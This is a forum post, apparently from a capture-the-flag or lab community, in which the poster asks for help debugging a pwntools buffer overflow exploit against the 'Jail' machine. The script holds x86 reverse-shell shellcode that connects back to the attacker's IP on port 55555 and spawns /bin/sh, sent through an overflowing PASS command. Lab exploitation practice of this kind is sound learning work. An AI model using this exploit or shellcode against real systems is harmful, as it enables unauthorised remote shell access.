Is there anyone that could help me out with the buffer overflow for jail?
I have created a buffer overflow following ippsecs tutorial but for some reason, I keep landing in my junk instead of landing in the buffer shellcode.
This is my exploit so far…
===========================================================
from pwn import *
context(os=‘linux’,arch=‘i386’)
HOST, PORT = ‘MY IP’, 7411
#Junk to get to EIP
junk = ‘\xCC’*28
#Memory leaked
mem = p32(0xffdc64c0 + 32)
#Shellcode to execute
buf = ‘’
buf += “\x68”
buf += REMOVED IP # ← IP Number
buf += “\x5e\x66\x68”
buf += “\xd9\x03” # ← Port Number “55555”
buf += “\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02”
buf += “\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79”
buf += “\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a”
buf += “\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f”
buf += “\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53”
buf += “\xeb\xce”
#Connect to host
p = remote(HOST, PORT)
p.recvuntil(“OK Ready. Send USER command.”)
p.sendline(“USER admin”)
p.recvuntil(“OK Send PASS command.”)
p.sendline(“DEBUG”)
p.recvuntil(“OK DEBUG mode on.”)
p.sendline("PASS " + junk + mem + buf)
============================================================
IPPSEC does the memory leak + 32 which includes the 28 needed to get to the overflow + the 4 needed for the mem. I have done this but unfortunately I keep getting SIGSEGV and it is reading back the \xCC’s.
Anyone notice what I am doing wrong? I am sure it will be something small that I am not over yet.